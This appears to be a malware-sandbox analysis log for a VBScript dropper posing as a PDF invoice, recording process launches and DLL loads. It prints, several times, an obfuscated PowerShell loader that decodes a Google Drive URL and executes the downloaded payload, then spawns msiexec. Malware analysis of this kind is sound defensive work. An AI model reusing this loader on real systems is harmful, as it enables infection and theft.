              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$SJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
